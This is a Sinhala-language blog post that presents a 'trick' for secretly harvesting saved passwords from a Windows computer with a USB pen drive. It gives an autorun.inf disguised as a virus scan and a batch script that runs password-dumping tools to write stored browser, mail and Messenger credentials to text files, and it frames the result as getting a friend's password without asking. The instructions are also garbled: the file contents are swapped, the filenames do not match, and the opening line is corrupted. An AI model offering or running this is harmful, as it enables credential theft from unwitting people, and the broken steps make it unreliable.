vQn\@d`\s\ es\.pW. p`r\s\vr\d| ek h#k\ krmEq?..

 

ඉතින් යාලුවේ ඔයාලට කොහොමද?..ඔයාල අතර තවමත් බොහොමයක් දෙනා භාවිතා කරන ඔපරේටින්ග් සිස්ටම් එක වින්ඩොඅස් නේද?..ඉතින් අදත් මන් පුන්චි ට්‍රික්ස් එකක් අරන් ආව ඔයාලට කියන්න.හැබැයි මේක වැඩ කරන්නේ වින්ඩෝස් වලට විතරයි....මොකක්ද දන්නවද ඒ ට්‍රික්ස් එක?... හැක් ක්‍රමයට වින්ඩොව්ස් වල ඇඩ්මිනිස්ටර් පාර්ස්වර්ඩ් එක හොයාගන්න ක්‍රමයක් ගැනයි...අපිට මේකට පොඩි පෙන් ඩ්‍රයිව් එකක්නම් අවශයය වෙනව...එහෙනම් පෙන් ඩ්‍රයිව් එකකුත් හොයාගෙන, මේ ලිපියත් හොන්දින් කියවල අවබොඅධයක් ලබාගෙන වැඩේට හා හාපුරා කියලා ලැහැස්තිවෙම්මුකො....

මේකයි කරන්න තියෙන්නේ ඉස් ඉස්සරලාම...
නොඅට් පෑඩ් එක ඔඅපන් කරගෙන, පහත කෝඩ් එක නිවරැදිව එකෙ ටයිප් කරගන්නකො.

ඔයාලට වැරදෙන්න පුලුවන් හින්දා මන් ඔන්න ලීව.කොපි කරලා පේස්ට් කරගන්නකො එහෙනම්.හරි..ඊටපස්සෙ පාර්ස්වර්ඩ් නමින් නමින් ඔඅක සේව් කරගන්නකො...ෆයිල් ෆොඅමැට් Eක. බැට් කියල ලබාදෙන්න... එ කියන්නෙ පහත විදිහට නම පර්ස්වර්ඩ්.බැට්   කියල තියෙන්න ඕන. password.bat

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

හරි.. ඊටපස්සේ නැවතත් අලුතෙන් නොඅට් පෑඩ් එක ඔඅපන් කරගෙන පහත කෝඩ් එක පහත ව්දිහට ඒකෙ ලියාගන, ඔටොඅරන් කියල නමකින් සේව් කරගන්න. හැබැයි ඒකෙ ෆයිල් ෆොඅමැට් එක autorun.inf කියල තියෙන්න ඔඅන. ඒ කියන්නෙ සම්පූර්න නම ඔටොරන්.ඉන්ෆො... autorun.inf

    start mspass.exe /stext mspass.txt

    start mailpv.exe /stext mailpv.txt

    start iepv.exe /stext iepv.txt

    start pspv.exe /stext pspv.txt

    start passwordfox.exe /stext passwordfox.txt

දැන් කරන්න තියෙන්නේ, ඔය ෆයිල් දෙකේ කොපියක් පෙන් ඩ්‍රයිව් එකකට ගන්න එකයි.
ඊටපස්සේ පෙන් ඩ්‍රයිව් එක ආරක්ෂාකාරිව පොර්ට් එකෙන් ඉවත් කරගෙන, නැවත පොඅර්ට් එකට ඇතුලු කරන්න. ඊටපස්සෙ ඔයාලට පහත විදිහට ඔටොඅරන් ඩයලොග් බොක්ස් එකක් ලැබේවි. ඒකෙ උඩින්ම තියන  නමින් තියන අයිකන් එක ශ්ලිශ් කරන්න.හරි ඔන්න දැන් වැඩේ ඉවරයි... පොඩි වෙලාවක්නම් ඉවසන්න වෙනව...ම්ම්ම්....දැන් බලන්න ඔයාලගෙ පෙන් ඩ්‍රයිව් එක ඔපන් කරලා. අලුත් ටෙක්ස්ක්ස් ෆයිල් එකක් හැදිල තියනව නේද?...ඔන්න ඔඅකෙ ඇති ඔයාලට ඔඅන කරන පර්ස්වඩ් එක...  දැන් ඉතින් ආයෙ යාලුවගෙ කොම්පියුටර් එකේ පර්ස්වර්ඩ් එක අහගන්න ඔඅන නැතිවෙවි..

 

ම්ම්ම්...එහෙනම් මන් ගිහින් එන්නම් යාලුවේ.. ඔයාල යන්න කලින් පහතින් කොමන්ට් එකක් දාල යන්න.

Home             Your details              About us                     Back

RC PLANE DESIGNS :>>

pcmultiya@gmail.com
pcmultiya@gmail.com